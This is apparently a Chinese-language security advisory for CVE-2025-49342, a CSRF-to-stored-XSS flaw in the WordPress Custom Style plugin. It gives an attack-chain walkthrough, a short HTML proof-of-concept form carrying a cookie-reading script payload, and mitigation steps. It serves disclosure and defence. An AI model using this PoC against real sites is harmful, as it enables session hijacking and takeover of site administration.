CVE-2025-49342 WordPress Custom Style插件CSRF存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-49342

漏洞类型

CSRF + 存储型XSS

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

merzedes Custom Style WordPress插件

漏洞概述

CVE-2025-49342是WordPress Custom Style插件中的一个跨站请求伪造（CSRF）漏洞，该漏洞可导致存储型跨站脚本（Stored XSS）攻击。Custom Style插件是一款用于WordPress网站的样式自定义工具，允许管理员通过后台界面自定义网站样式。该插件在处理用户输入时缺乏适当的CSRF令牌验证和输入过滤机制，攻击者可以利用此漏洞诱导已登录的管理员访问恶意页面，在管理员不知情的情况下向插件提交包含恶意JavaScript代码的请求。由于该XSS是存储型的，恶意脚本会被永久保存在数据库中，当其他管理员或用户访问相关页面时，恶意代码会自动执行，可能导致会话劫持、凭据窃取、管理后台被完全控制等严重后果。此漏洞影响Custom Style插件1.0及以下所有版本，CVSS评分7.1，属于高危漏洞。由于该漏洞利用需要用户交互（诱导管理员点击链接），建议尽快更新到最新版本或采取临时缓解措施。

技术细节

该漏洞存在于WordPress Custom Style插件的样式保存功能中。攻击流程如下：首先，攻击者精心构造一个包含恶意JavaScript代码的HTML表单，该表单模拟插件正常的样式保存请求。由于插件后端未正确验证CSRF令牌，服务器会接受这个来自攻击者控制站点的请求。当管理员访问攻击者提供的恶意页面时，浏览器会自动提交预先构造的请求到目标WordPress站点。如果管理员已登录，浏览器会携带有效的会话Cookie，插件会错误地将恶意代码作为样式设置保存到数据库中。由于该数据是存储型的，所有访问包含该样式输出页面的用户都会触发恶意JavaScript代码执行。攻击者通常会将恶意代码隐藏在样式设置或自定义CSS/JS字段中，利用WordPress的样式渲染机制触发执行。此类漏洞的危险在于攻击者无需直接访问目标服务器，只需诱导目标管理员访问特定页面即可完成攻击。

攻击链分析

STEP 1

步骤1

攻击者创建恶意HTML页面，包含自动提交表单，模拟Custom Style插件的样式保存请求

STEP 2

步骤2

攻击者通过钓鱼邮件、社交工程或恶意网站诱导WordPress管理员访问恶意页面

STEP 3

步骤3

管理员浏览器自动发送POST请求到目标WordPress站点，携带有效会话Cookie

STEP 4

步骤4

插件后端因缺少CSRF验证，接受恶意请求并将包含XSS payload的样式数据存储到数据库

STEP 5

步骤5

任何用户访问包含该样式输出的页面时，恶意JavaScript代码自动执行，导致会话劫持或凭据窃取

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2025-49342 - Custom Style Plugin Stored XSS -->
<!DOCTYPE html>
<html>
<head>
    <title>CSRF Attack PoC</title>
</head>
<body>
    <h1>Custom Style Plugin CSRF PoC</h1>
    <p>Click the button below to trigger the attack:</p>
    
    <form action="http://target-wordpress-site/wp-admin/admin-post.php" method="POST" id="csrfForm">
        <input type="hidden" name="action" value="save_custom_style">
        <input type="hidden" name="custom_style_data" value='<script>alert(document.cookie)</script>'> 
        <input type="hidden" name="nonce" value="attacker_controlled_or_missing">
    </form>
    
    <button type="submit" onclick="document.getElementById('csrfForm').submit();">Click Me</button>
    
    <script>
        // Auto-submit on page load (for demonstration)
        // window.onload = function() { document.getElementById('csrfForm').submit(); };
    </script>
</body>
</html>

影响范围

Custom Style <= 1.0

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1）禁用或删除Custom Style插件；2）使用WordPress安全插件（如Wordfence）添加CSRF保护规则；3）通过.htaccess或WAF规则限制admin-post.php等敏感接口的访问来源；4）启用双因素认证增强管理员账户安全；5）监控网站文件变更和数据库异常写入行为。建议密切关注插件官方更新，及时应用安全补丁。